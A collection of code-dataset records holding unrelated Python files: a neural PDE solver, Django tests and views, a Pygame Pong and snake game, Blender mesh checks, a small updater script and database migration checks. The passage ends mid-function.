Exact[len2:, :]\n\n X, T = np.meshgrid(x, t)\n X_train, T_train = np.meshgrid(x, t_train)\n X_val, T_val = np.meshgrid(x, t_val)\n X_test, T_test = np.meshgrid(x, t_test)\n\n X_star = np.hstack((X.flatten()[:, None], T.flatten()[:, None]))\n u_star = Exact.flatten()[:, None]\n X_tr_star = np.hstack((X_train.flatten()[:, None], T_train.flatten()[:, None]))\n u_tr_star = Exact_train.flatten()[:, None]\n X_val_star = np.hstack((X_val.flatten()[:, None], T_val.flatten()[:, None]))\n u_val_star = Exact_val.flatten()[:, None]\n X_test_star = np.hstack((X_test.flatten()[:, None], T_test.flatten()[:, None]))\n u_test_star = Exact_test.flatten()[:, None]\n\n lb = X_tr_star.min(0) \n ub = X_tr_star.max(0)\n\n xx1 = np.hstack((X_train[0:1, :].T, T_train[0:1, :].T))\n uu1 = Exact_train[0:1, :].T\n xx2 = np.hstack((X_train[:, 0:1], T_train[:, 0:1]))\n uu2 = Exact_train[:, 0:1]\n\n X_u_train = np.vstack([xx1, xx2])\n X_f_train = lb + (ub - lb) * lhs(2, N_f)\n X_f_train = np.vstack((X_f_train, X_u_train))\n u_train = np.vstack([uu1, uu2])\n\n idx = np.random.choice(X_u_train.shape[0], N_u, replace=False) \n X_u_train = X_u_train[idx, :]\n u_train = u_train[idx, :]\n\n start_time = time.time()\n\n model = DPM(X_u_train, u_train, X_f_train, layers, lb, ub, nu, learning_rate, epsilon, delta, w)\n\n loss, loss_u, loss_f, mean_u_of_epoch, mean_f_of_epoch, mean_mape_u_of_epoch, var_u_of_epoch, var_f_of_epoch, var_mape_u_of_epoch, \\\n worst_u_of_epoch, worst_f_of_epoch, worst_mape_u_of_epoch, epoch, error_u_extra, validation_error, best_it =\\\n model.train(30000, 50, 0.00001, X_val_star, u_val_star, num_layers, num_neurons, learning_rate, epsilon, delta, w)\n u_pred_inter, f_pred_inter = model.predict(X_tr_star, best_it)\n u_pred_test, f_pred_test = model.predict(X_test_star, best_it)\n u_pred, f_pred = model.predict(X_star, best_it)\n\n elapsed = time.time() - start_time\n print('Training time: %.4f' % (elapsed))\n\n error_u_inter = np.linalg.norm(u_tr_star- u_pred_inter, 2) / np.linalg.norm(u_tr_star, 2)\n print('Error u: %e' % (error_u_inter))\n\n print('Error u: %e' % (error_u_extra))\n\n error_u_test = np.linalg.norm(u_test_star - u_pred_test, 2) / np.linalg.norm(u_test_star, 2)\n print('Error u: %e' % (error_u_test))\n\n # plotting\n\n U_star = griddata(X_star, u_star.flatten(), (X, T), method='cubic')\n U_pred = griddata(X_star, u_pred.flatten(), (X, T), method='cubic')\n \n model.plotting_whole_graph(U_star, U_pred, X_u_train, u_train, x, t, Exact)\n\n return error_u_inter, error_u_extra, error_u_test, best_it\n\n\nif __name__ == \"__main__\":\n\n num_layers = int(sys.argv[1])\n num_neurons = int(sys.argv[2])\n learning_rate = float(sys.argv[3])\n epsilon = float(sys.argv[4])\n delta = float(sys.argv[5])\n w = float(sys.argv[6])\n \n result = main_loop(num_layers, num_neurons, learning_rate, epsilon, delta, w)\n print(result)\n \n","sub_path":"Viscous_Burgers/Burgers_parameter_opt_Adam_con_limit_ResNet_DPM.py","file_name":"Burgers_parameter_opt_Adam_con_limit_ResNet_DPM.py","file_ext":"py","file_size_in_byte":20096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"244845690","text":"from django.test import TestCase\nfrom rest_framework.exceptions import ValidationError\n\nfrom soccer.serializers import SoccerStatCreateSerializer, MatchCreateSerializer\n\nfrom users.models import User\nfrom soccer.models import Match, SoccerStat\n\n\nclass SoccerStatCreateSerializerTest(TestCase):\n\n def setUp(self):\n self.user = User.objects.create(username='Joe')\n\n def test_with_match(self):\n match = Match.objects.create()\n valid_data = {'user': self.user.id, 'stat_type': 'goal', 'value': 1, 'stat_uuid': 'some-uuid', 'match': match.id}\n serializer = SoccerStatCreateSerializer(data=valid_data)\n stat, created = serializer.get_or_create()\n\n stat.refresh_from_db()\n self.assertTrue(created)\n self.assertEqual('some-uuid', stat.stat_uuid)\n\n def test_without_match(self):\n valid_data = {'user': self.user.id, 'stat_type': 'kcoins', 'value': 1, 'stat_uuid': 'some-uuid'}\n serializer = SoccerStatCreateSerializer(data=valid_data)\n stat, created = serializer.get_or_create()\n\n stat.refresh_from_db()\n self.assertTrue(created)\n self.assertEqual('some-uuid', stat.stat_uuid)\n self.assertIsNone(stat.match)\n\n def test_with_existing_uuid(self):\n existing_uuid = 'test-uuid'\n existing_stat = SoccerStat.objects.create(user=self.user, stat_uuid=existing_uuid, stat_type='kcoins', value=5)\n\n valid_data = {'user': self.user.id, 'stat_type': 'kcoins', 'value': 10, 'stat_uuid': existing_uuid}\n serializer = SoccerStatCreateSerializer(data=valid_data)\n stat, created = serializer.get_or_create()\n\n self.assertFalse(created)\n self.assertEqual(existing_stat.id, stat.id)\n self.assertEqual(existing_uuid, stat.stat_uuid)\n\n def test_with_invalid_data(self):\n invalid_data = {'user': self.user.id, 'stat_type': 'invalid', 'value': 1, 'stat_uuid': 'some-uuid'}\n serializer = SoccerStatCreateSerializer(data=invalid_data)\n self.assertRaises(ValidationError, lambda: serializer.get_or_create())\n\n\nclass CreateMatchSerializerTest(TestCase):\n\n def setUp(self):\n super().setUp()\n\n def test_success(self):\n valid_data = {'competition': 'comp', 'home_team': 'a', 'away_team': 'b', 'home_players': ['user1', 'user2'], 'away_players': ['user3', 'user4']}\n serializer = MatchCreateSerializer(data=valid_data)\n self.assertTrue(serializer.is_valid(), serializer.errors)\n\n def test_user_in_both_teams(self):\n invalid_data = {'competition': 'comp', 'home_team': 'a', 'away_team': 'b', 'home_players': ['user1', 'user2'], 'away_players': ['user2', 'user3']}\n serializer = MatchCreateSerializer(data=invalid_data)\n self.assertFalse(serializer.is_valid())\n\n def test_away_players_missing(self):\n invalid_data = {'competition': 'comp', 'home_team': 'a', 'away_team': 'b', 'home_players': ['user1', 'user2']}\n serializer = MatchCreateSerializer(data=invalid_data)\n self.assertFalse(serializer.is_valid())\n","sub_path":"kbackend/soccer/test/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"641890721","text":"from setuptools import setup\n\nrequirements = [\n # package requirements go here\n]\n\nsetup(\n name='psl',\n description=\"dynamic Systems Library in Python\",\n license=\"MIT\",\n author=\"Aaron Tuor, Jan Drgona, Elliott Skomski, Soumya Vasisht\",\n author_email='aarontuor@gmail.com',\n url='https://github.com/aarontuor/psl',\n packages=['psl'],\n package_data={'psl': ['psl/parameters/buildings/*']},\n entry_points={\n 'console_scripts': [\n 'psl=psl.cli:cli'\n ]\n },\n install_requires=requirements,\n keywords='psl',\n classifiers=[\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n ], include_package_data=True\n)\n","sub_path":"psl/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"582220268","text":"import os\nimport zipfile\nimport urllib.request\n\nf = open('UpdaterFiles/serverData.txt','r')\ntext = f.read()\nadress = text.split('\\n')[0]\nname = text.split('\\n')[1]\nurllib.request.urlretrieve(adress, name)\n\nfh = open(name, 'rb')\nz = zipfile.ZipFile(fh)\nfor n in z.namelist():\n outpath = os.getcwd()\n z.extract(n, outpath)\nfh.close()\n\nos.remove(name)","sub_path":"UpdaterFiles/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"237890074","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport pygame\nimport sys\nfrom pygame.locals import *\n\n# Przygotowanie zmiennych opisujących okno gry\n# oraz obiekty gry i ich właściwości (paletki, piłeczka)\n# Inicjacja modułu i obiektów Pygame'a\n\n# inicjacja modułu pygame\npygame.init()\n\n# liczba klatek na sekundę\nFPS = 30\n# obiekt zegara, który pozwala śledzić czas\nfpsClock = pygame.time.Clock()\n\n# szerokość i wysokość okna gry\nOKNOGRY_SZER = 800\nOKNOGRY_WYS = 400\n\n# przygotowanie powierzchni do rysowania, czyli inicjacja okna gry\nOKNOGRY = pygame.display.set_mode((OKNOGRY_SZER, OKNOGRY_WYS), 0, 32)\n# tytuł okna gry\npygame.display.set_caption('Prosty Pong')\n\n# kolory wykorzystywane w grze, których składowe RGB zapisane są w tuplach\nLT_BLUE = (230, 255, 255)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n","sub_path":"games_str/pong_str/pong_str1.py","file_name":"pong_str1.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"402889667","text":"from flask import Flask, request, jsonify, send_file\n\nimport firebase_driver\n\napp = application = Flask(__name__)\n\n\n@app.route('/upload/', methods=['POST'])\ndef upload(source):\n file = request.files['picture']\n firebase_driver.upload(file, source)\n return jsonify(''), 200\n\n\n@app.route('/', methods=['GET'])\ndef get(source):\n file_path = firebase_driver.get(source)\n return send_file(file_path), 200\n\n\nif __name__ == '__main__':\n app.run(port=8000, debug=True)\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"83373852","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\n### --- VERTEX GROUP CHECKS --- ###\n\ndef checkHasAnyVGroups(obj):\n return len(obj.vertex_groups) > 0\n\ndef checkAllVerticesBelongToAVGroup(obj):\n for vert in obj.data.vertices:\n if len(vert.groups) < 1:\n return False\n return True\n\ndef checkAllVerticesBelongToAtMostOneVGroup(obj):\n for vert in obj.data.vertices:\n if len(vert.groups) > 1:\n vgroup_names = {vgroup.index: vgroup.name for vgroup in obj.vertex_groups}\n hint = \"Vertex with index \" + str(vert.index) + \" belongs to the following groups:\\n\"\n grps = \"\"\n for group in vert.groups:\n if len(grps) > 0:\n grps += \", \"\n grps += vgroup_names[group.group]\n return (False, hint + grps)\n return (True, \"\")\n\ndef checkVertexGroupAssignmentsAreNotCorrupt(obj):\n validIndices = []\n for vg in obj.vertex_groups:\n validIndices.append(vg.index)\n for vert in obj.data.vertices:\n for group in vert.groups.keys():\n if not int(group) in validIndices:\n hint = \"Vertex with index \" + str(vert.index) + \" is assigned to a vertex group with index \" + \\\n str(vert.groups[group]) + \",\\nbut that group does not exist\\n\"\n return (False, hint)\n return (True, \"\")\n\ndef checkAllVGroupsInFirstExistsInSecond(firstObj, secondObj):\n firstObjVGroups = []\n secondObjVGroups = []\n\n for vg in firstObj.vertex_groups:\n firstObjVGroups.append(vg.name)\n\n for vg in secondObj.vertex_groups:\n secondObjVGroups.append(vg.name)\n\n hint = \"\"\n b = True\n for name in firstObjVGroups:\n if not name in secondObjVGroups:\n hint += name + \"\\n\" # do all to create a list\n b = False\n\n return (b, hint)\n\n### --- FACE CHECKS --- ###\n\n# if vertices belong to no faces at all it will also not work\n#\ndef checkStrayVertices(obj):\n verts = obj.data.vertices\n facesfound = {}\n for v in verts:\n facesfound[v.index] = False\n for faces in obj.data.polygons:\n for vn in faces.vertices:\n facesfound[vn] = True\n info = \"\"\n b = True\n cnt = 0\n for v in verts:\n if not facesfound[v.index]:\n b = False\n cnt += 1\n if cnt < 10:\n info += \" \" + str(v.index)\n if info != \"\":\n info = \"Stray verts:\" + info\n return (b, cnt, info)\n\ndef checkNumberOfPoles(obj, max_def):\n verts = obj.data.vertices\n edges = obj.data.edges\n vertEdges = [0 for d in range(len( obj.data.vertices))]\n maxpole = 0\n info = \"\"\n cnt = 0\n\n for edge in edges:\n for vertex in edge.vertices:\n vertEdges[vertex] += 1\n if vertEdges[vertex] > max_def:\n maxpole = vertEdges[vertex] # highest number\n if vertEdges[vertex] == (max_def + 1): # but only count them once\n cnt += 1\n if cnt < 10:\n info += \" \" + str(vertex)\n print (maxpole)\n if info != \"\":\n info = \"Max-Pole is \" + str(maxpole) + \". Vertices:\" + info\n return (maxpole <= max_def, cnt, info)\n \n\ndef checkFacesHaveAtMostFourVertices(obj):\n for polygon in obj.data.polygons:\n verts_in_face = polygon.vertices[:]\n if len(verts_in_face) > 4:\n return False\n return True\n\ndef checkFacesHaveTheSameNumberOfVertices(obj):\n countToLookFor = None\n for polygon in obj.data.polygons:\n verts_in_face = polygon.vertices[:]\n if countToLookFor is None:\n countToLookFor = len(verts_in_face)\n else:\n if len(verts_in_face) != countToLookFor:\n return False\n return True\n\n### --- UV MAP CHECKS --- ###\n\ndef checkNumberOfUVMaps(obj):\n uvlayers = obj.data.uv_layers\n cnt = 0\n if uvlayers:\n for (index,layer) in enumerate(uvlayers.keys()):\n cnt += 1\n if cnt == 0:\n return (False, cnt, \"No texture possible.\")\n elif cnt == 1:\n return (True, cnt, \"\")\n else:\n return (False, cnt, \"Active map is: \" + uvlayers.active.name)\n\n# checkSanityHuman\n# do all tests on a human basemesh\n\ndef checkSanityHuman(context):\n errortext = \"\"\n info = \"\"\n\n humanObj = None\n cnt = 0\n for obj in context.scene.objects:\n if hasattr(obj, \"MhObjectType\"):\n if obj.MhObjectType == \"Basemesh\":\n cnt += 1\n if humanObj is None:\n humanObj = obj\n\n icon = \"\\001\"\n if cnt == 0:\n errortext += \"Could not find any human object in this scene.\\n\"\n icon = \"\\002\"\n elif cnt > 1:\n icon = \"\\002\"\n errortext += \"There are multiple human objects in this scene.\\nTo avoid errors, only use one.\\n\"\n info += icon + \"Number of human objects is exactly 1 in the scene.\\n\"\n\n if cnt == 0: # we have to return, without a human at all no further checks possible\n return (1, info, errortext)\n\n icon = \"\\001\" # now we try the test on the first object\n if not checkHasAnyVGroups(humanObj):\n errortext += \"The human object does not have any vertex group.\\nIt has to have at least one for MakeClothes to work.\\n\"\n icon = \"\\002\"\n info += icon + \"At least one vertex group is available.\\n\"\n\n icon = \"\\001\"\n (b, hint) = checkVertexGroupAssignmentsAreNotCorrupt(humanObj)\n if not b:\n errortext += \"The human object has vertices which belong non-existing\\n\" + hint\n icon = \"\\002\"\n info += icon + \"No vertex belongs to a non-existing group.\\n\"\n return (len(errortext) > 0, info, errortext)\n\n\n\n# checkSanityClothes\n# do all tests on a piece of cloth (called when creating the clothes, but also for a check)\n#\n# allowed to be called with second argument for checks between two objects\n\ndef checkSanityClothes(obj, humanobj=None):\n errortext = \"\"\n info = \"\"\n max_def_poles = 8\n errorcnt = 0\n\n icon = \"\\001\"\n (b, cnt, hint) = checkStrayVertices(obj)\n if not b:\n icon = \"\\002\"\n errortext += \"Object has \" + str(cnt) + \" stray vertices.\\n\" + hint\n errorcnt += 1\n info += icon + \"No stray vertices.\\n\"\n\n icon = \"\\001\"\n (b, cnt, hint) = checkNumberOfPoles(obj, max_def_poles)\n if not b:\n icon = \"\\003\"\n errortext += \"Object has \" + str(cnt) + \" vertices with more than \" + str(max_def_poles) + \" edges attached (poles).\\n\" + hint\n info += icon + \"Number of poles <= \" + str(max_def_poles) + \".\\n\"\n\n icon = \"\\001\"\n suppress = 0\n if not checkFacesHaveAtMostFourVertices(obj):\n errortext += \"This object has at least one face with more than four vertices.\\nN-gons are not supported by MakeClothes.\\n\"\n errorcnt += 1\n icon = \"\\002\"\n suppress = 1\n info += icon + \"Faces do not have more than 4 vertices.\\n\"\n\n # in case that we have somewhere more than 4 vertices, second test will normally also fail\n #\n if suppress == 0:\n icon = \"\\001\"\n if not checkFacesHaveTheSameNumberOfVertices(obj):\n errortext += \"This object has faces with different numbers of vertices.\\nTris *or* quads are supported, but not a mix of the two.\\n\"\n errorcnt += 1\n icon = \"\\002\"\n info += icon + \"Faces are either tris or quads.\\n\"\n\n icon = \"\\001\"\n if not checkHasAnyVGroups(obj):\n errortext += \"This object does not have any vertex group.\\nIt has to have at least one for MakeClothes to work.\\n\"\n errorcnt += 1\n icon = \"\\002\"\n info += icon + \"At least one vertex group must exist.\\n\"\n\n icon = \"\\001\"\n if not checkAllVerticesBelongToAVGroup(obj):\n errortext += \"This object has vertices which do not belong to a vertex group.\\n\"\n errorcnt += 1\n icon = \"\\002\"\n info += icon + \"All vertices belong to a vertex group.\\n\"\n\n icon = \"\\001\"\n (b, hint) = checkAllVerticesBelongToAtMostOneVGroup(obj)\n if not b:\n errortext += \"This object has vertices which belong to multiple vertex groups.\\n\" + hint\n errorcnt += 1\n icon = \"\\002\"\n info += icon + \"No vertex belongs to multiple groups.\\n\"\n\n icon = \"\\001\"\n (b, hint) = checkVertexGroupAssignmentsAreNotCorrupt(obj)\n if not b:\n errortext += \"This object has vertices which belong non-existing vertex groups,\\n\" + hint\n icon = \"\\002\"\n info += icon + \"No vertex is assigned to a non existing group.\\n\"\n\n if humanobj is not None:\n icon = \"\\001\"\n (b, hint) = checkAllVGroupsInFirstExistsInSecond(obj, humanobj)\n if not b:\n errorcnt += 1\n errortext += \"This object has vertex groups which are missing on human,\\nThese groups are:\\n\" + hint\n icon = \"\\002\"\n info += icon + \"All vertex groups exist on human.\\n\"\n\n icon = \"\\001\"\n (b, cnt, hint) = checkNumberOfUVMaps(obj)\n if not b:\n icon = \"\\003\"\n info += icon + \"Object has \" + str(cnt) + \" UV-maps. \" + hint +\"\\n\"\n\n return (errorcnt > 0, info, errortext)\n","sub_path":"makeclothes/sanitychecks.py","file_name":"sanitychecks.py","file_ext":"py","file_size_in_byte":9072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"158763317","text":"def reversedSumOfDigits(p, n):\n if (p == 0 and n == 1):\n return \"0\"\n a = \"\"\n for i in range(1, n + 1):\n start = 1 if i == 1 else 0\n for d in range(start, 10):\n if ((n - i) * 9 + d >= p):\n a = a + str(d)\n p -= d\n break\n\n if (len(a) == n and p == 0):\n return a\n return \"-1\"\n","sub_path":"tasks/reversedSumOfDigits.py","file_name":"reversedSumOfDigits.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"221341276","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPlayer module.\n\"\"\"\n\nfrom collections import deque\n\nimport pygame\nfrom pygame.locals import (K_LEFT, K_RIGHT, K_UP, K_DOWN, K_l, K_k, K_j,\n K_a, K_d, K_w, K_s, K_c, K_v, K_b)\n\nfrom colors import WHITE, RED, ORANGE, BLUE\nfrom snake import Snake, LEFT, RIGHT, UP, DOWN\nfrom utils import add_vecs\nfrom combat import Weapon, STD_MG, H_GUN, PLASMA_GUN\nfrom settings import (INIT_BOOST, MAX_BOOST, BOOST_COST, BOOST_GAIN,\n BOOST_SPEED, INIT_LIFES, MAX_LIFES, PORTAL_TAG,\n PWRUP_TAG, SHOT_TAG, MAX_HITPOINTS)\n\n# -- Controls --\nCTRLS1 = {'left': K_LEFT, 'right': K_RIGHT, 'up': K_UP, 'down': K_DOWN,\n 'action': K_l, 'boost': K_k, 'nextweapon': K_j}\n\nCTRLS2 = {'left': K_a, 'right': K_d, 'up': K_w, 'down': K_s, 'action': K_c,\n 'boost': K_v, 'nextweapon': K_b}\n\n# -- Players --\nPLAYER1 = {'id': '1', 'color': BLUE, 'ctrls': CTRLS1,\n 'tex': 'snake_body_p1'}\n\nPLAYER2 = {'id': '2', 'color': RED, 'ctrls': CTRLS2,\n 'tex': 'snake_body_p2'}\n\nBOT = {'id': 2, 'color': RED, 'tex': 'snake_body_p2'}\n\n\nclass PlayerBase(object):\n\n \"\"\"\n Player base class.\n \"\"\"\n\n def __init__(self, game, config):\n self.game = game\n self.pid = config['id']\n self.color = config['color']\n self.snake = Snake(game, game.get_spawnpoint(),\n config['tex'], self.pid, self.snake_killed)\n self._lifes = INIT_LIFES\n self.points = 0\n self._boost = INIT_BOOST\n self.boosting = False\n self.weapons = deque((\n Weapon(self.game, self, STD_MG),\n Weapon(self.game, self, H_GUN),\n Weapon(self.game, self, PLASMA_GUN)))\n self.pwrup_targets = {'points': 'points', 'grow': 'snake.grow',\n 'speed': 'snake.speed', 'boost': 'boost',\n 'lifes': 'lifes', 'hp': 'snake.hitpoints'}\n\n @property\n def lifes(self):\n \"\"\"Return lifes.\"\"\"\n return self._lifes\n\n @lifes.setter\n def lifes(self, value):\n \"\"\"Set lifes.\"\"\"\n if value > MAX_LIFES:\n self._lifes = MAX_LIFES\n elif value < 0:\n self._lifes = 0\n else:\n self._lifes = value\n\n @property\n def boost(self):\n \"\"\"Return boost energy.\"\"\"\n return self._boost\n\n @boost.setter\n def boost(self, value):\n \"\"\"Set boost energy.\"\"\"\n if value > MAX_BOOST:\n self._boost = MAX_BOOST\n elif value < 0:\n self._boost = 0\n else:\n self._boost = value\n\n def coll_check_head(self, collobjs):\n \"\"\"Handle collisions for the snake's head.\"\"\"\n for tag, obj in collobjs:\n if (tag.endswith('-body') or tag.endswith('-head')) and \\\n tag != self.snake.head_tag:\n obj.take_damage(35, self.snake.head_tag, False, True,\n 0.7, shrink=1, slowdown=0.03)\n elif tag == PORTAL_TAG:\n self.snake.heading = obj[1]\n self.snake[0] = add_vecs(obj[0], self.snake.heading)\n elif tag == PWRUP_TAG:\n for action in obj.actions:\n target = self.pwrup_targets[action['target']]\n if '.' in target:\n target1, target2 = target.split('.')\n attr = getattr(getattr(self, target1), target2)\n setattr(getattr(self, target1),\n target2, attr + action['value'])\n else:\n attr = getattr(self, target)\n setattr(self, target, attr + action['value'])\n obj.collect()\n elif tag == SHOT_TAG:\n self.handle_shot(obj)\n\n def coll_check_body(self, collobjs):\n \"\"\"Handle collisions for the snakes's body.\"\"\"\n for tag, obj in collobjs:\n if tag == SHOT_TAG:\n self.handle_shot(obj)\n\n def handle_shot(self, shot):\n \"\"\"Handle shot.\"\"\"\n self.snake.take_damage(shot.damage, shot.tag, False, True, 1.2,\n slowdown=shot.slowdown, shrink=1)\n shot.hit()\n\n def update(self, delta_time):\n \"\"\"Update player, move snake.\"\"\"\n self.snake.update(delta_time)\n\n self.weapons[0].update(delta_time)\n\n if self.snake.heading != self.snake.prev_heading:\n self.snake.ismoving = True\n\n if self.boost < BOOST_COST * delta_time:\n self.boosting = False\n self.snake.speed_bonus = 0\n\n if self.boosting:\n boost = self.boost - BOOST_COST * delta_time\n if boost < BOOST_COST * delta_time:\n self.boost = 0\n else:\n self.boost = boost\n else:\n self.boost = self.boost + BOOST_GAIN * delta_time\n\n def draw(self, offset):\n \"\"\"Draw snake and UI.\"\"\"\n self.snake.draw()\n self.game.draw_string('Player{0}'.format(self.pid),\n add_vecs((2, 2), offset), self.color)\n self.game.draw_string('{0:.2f}'.format(self.snake.speed),\n add_vecs((56, 2), offset), WHITE)\n self.game.draw_string('Points: {0}'.format(self.points),\n add_vecs((2, 18), offset), WHITE)\n\n pygame.draw.rect(self.game.screen, ORANGE,\n pygame.Rect(add_vecs((100, 2), offset), (104, 20)))\n\n pygame.draw.rect(self.game.screen, RED,\n pygame.Rect(add_vecs((102, 4), offset), (int(\n self.snake.hitpoints /\n float(MAX_HITPOINTS) * 100), 7)))\n\n pygame.draw.rect(self.game.screen, BLUE,\n pygame.Rect(add_vecs((102, 13), offset), (int(\n self.boost / float(MAX_BOOST) * 100), 7)))\n\n self.game.draw_string('{0} {1}'.format(self.weapons[0].wtype,\n self.weapons[0].ammo),\n add_vecs((208, 2), offset), WHITE)\n\n for i in range(self.lifes):\n self.game.graphics.draw('life16x16', add_vecs((100, 24), offset),\n gridcoords=False, offset=(i*18, 0))\n\n def snake_killed(self, killed_by):\n \"\"\"Snake killed event handler.\"\"\"\n if self.lifes > 0:\n self.lifes -= 1\n self.boost = MAX_BOOST\n self.snake.respawn(self.game.get_spawnpoint())\n\n\nclass Player(PlayerBase):\n\n \"\"\"\n Player class.\n \"\"\"\n\n def __init__(self, game, config):\n PlayerBase.__init__(self, game, config)\n\n self.game.key_manager.key_down_event.append(self.key_down)\n self.game.key_manager.key_up_event.append(self.key_up)\n self.ctrls = config['ctrls']\n\n def key_down(self, key):\n \"\"\"Key down event handler.\"\"\"\n if key == self.ctrls['boost']:\n self.boosting = True\n self.snake.speed_bonus = BOOST_SPEED\n elif key == self.ctrls['action']:\n # Has the potential to cause an endless loop.\n while self.weapons[0].ammo <= 0:\n self.weapons.rotate(1)\n self.weapons[0].set_firing(True)\n\n def key_up(self, key):\n \"\"\"Key up event handler.\"\"\"\n if key == self.ctrls['boost']:\n self.boosting = False\n self.snake.speed_bonus = 0\n elif key == self.ctrls['action']:\n self.weapons[0].set_firing(False)\n\n def update(self, delta_time):\n \"\"\"Update player.\"\"\"\n\n PlayerBase.update(self, delta_time)\n\n if self.game.key_manager.key_pressed(self.ctrls['left']) \\\n and self.snake.heading != RIGHT:\n self.snake.set_heading(LEFT)\n elif self.game.key_manager.key_pressed(self.ctrls['up']) \\\n and self.snake.heading != DOWN:\n self.snake.set_heading(UP)\n elif self.game.key_manager.key_pressed(self.ctrls['down']) \\\n and self.snake.heading != UP:\n self.snake.set_heading(DOWN)\n elif self.game.key_manager.key_pressed(self.ctrls['right']) \\\n and self.snake.heading != LEFT:\n self.snake.set_heading(RIGHT)\n\n if self.game.key_manager.key_tapped(self.ctrls['nextweapon']):\n # Dangerous...\n self.weapons.rotate(1)\n while self.weapons[0].ammo <= 0:\n self.weapons.rotate(1)\n","sub_path":"src/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":8535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"339374867","text":"import mysql_migration as mm\n\n\n# -------------검증 1번-------------------\nconn_dooodb = mm.get_mysql_conn('dooodb')\nwith conn_dooodb:\n dooo_cnt_emp = mm.get_count(conn_dooodb, 'Employee')\n dooo_cnt_dept = mm.get_count(conn_dooodb, 'Department')\n dooo_cnt_job = mm.get_count(conn_dooodb, 'Job')\n dooo_cnt_jobhis = mm.get_count(conn_dooodb, 'Job_history')\n\nconnection = mm.get_oracle_conn()\nwith connection:\n ora_cnt_emp = mm.get_count(connection, 'Employees')\n ora_cnt_dept = mm.get_count(connection, 'Departments')\n ora_cnt_job = mm.get_count(connection, 'Jobs')\n ora_cnt_jobhis = mm.get_count(connection, 'Job_history')\n\n#--------------------------------검증 2번 함수화------------------------------------\n\n\n\nora_emp_column = 'employee_id, first_name, last_name, email, phone_number, hire_date, job_id, round(salary), round(commission_pct * 100), manager_id, department_id'\nmys_emp_column = 'id, first_name, last_name, email, phone_number, hire_date, job_id, round(salary), round(commission_pct * 100), manager_id, department_id'\n\nora_dept_column = 'department_id, department_name, manager_id'\nmys_dept_column = 'id, department_name, manager_id' \n\nora_job_column = 'job_id, job_title, min_salary, max_salary'\nmys_job_column = 'id, job_title, min_salary, max_salary'\n\nora_jobhis_column = 'employee_id, start_date, end_date, job_id, department_id'\nmys_jobhis_column = 'employee_id, start_date, end_date, job_id, department_id'\n\ncounts = [(dooo_cnt_emp, ora_cnt_emp), (dooo_cnt_dept, ora_cnt_dept), (dooo_cnt_job, ora_cnt_job), (dooo_cnt_jobhis, ora_cnt_jobhis) ]\nora_column = [ora_emp_column, ora_dept_column, ora_job_column, ora_jobhis_column]\nora_table = ['Employees', 'Departments', 'Jobs', 'Job_history' ]\nmys_column = [mys_emp_column, mys_dept_column, mys_job_column, mys_jobhis_column]\nmys_table = ['Employee', 'Department', 'Job', 'Job_history' ]\nmys_id = ['id', 'id', 'id', 'employee_id']\n\nfor k in range(0,4):\n if counts[k][0] != counts[k][1]:\n print(\"=================== \", mys_table[k], \" Failed=======================\")\n break\n else:\n mm.valid (ora_column[k], ora_table[k] , mys_column[k], mys_table[k], mys_id[k] )\n\n\n","sub_path":"sql/valid_refac.py","file_name":"valid_refac.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"207406943","text":"from etl.Transformers.TableTransformer import TableTransformer\n\n\nclass CollegesTransformer(TableTransformer):\n LABELS_COLUMN = 'labels'\n EP_LABEL = 'system gen: ep'\n EP_COLLEGE_ID = 4252\n\n def clean_colleges(self, df):\n df.loc[df[self.LABELS_COLUMN].str.contains(self.EP_LABEL), 'college_id'] = self.EP_COLLEGE_ID\n del df[self.LABELS_COLUMN]\n return df\n","sub_path":"etl/Transformers/HelperClasses/CollegesTransformer.py","file_name":"CollegesTransformer.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"600679164","text":"from django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User, UserManager\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.views.decorators.http import require_http_methods\n\n\nfrom .models import Budget, Transaction, TransactionForm, Account, AccountForm, Category, CategoryForm, ParentCategory, Allocation, AllocationForm\n\nfrom datetime import datetime\n\n# Create your views here.\n\n# Authentication Views\ndef _login(request):\n if request.method == \"POST\":\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return HttpResponseRedirect(reverse('budget-index'))\n else:\n return HttpResponse('You are not an active user.')\n else:\n return render(request, 'budget/login.html', {'error': 'Invalid login credentials'})\n else:\n if request.user.is_authenticated():\n return 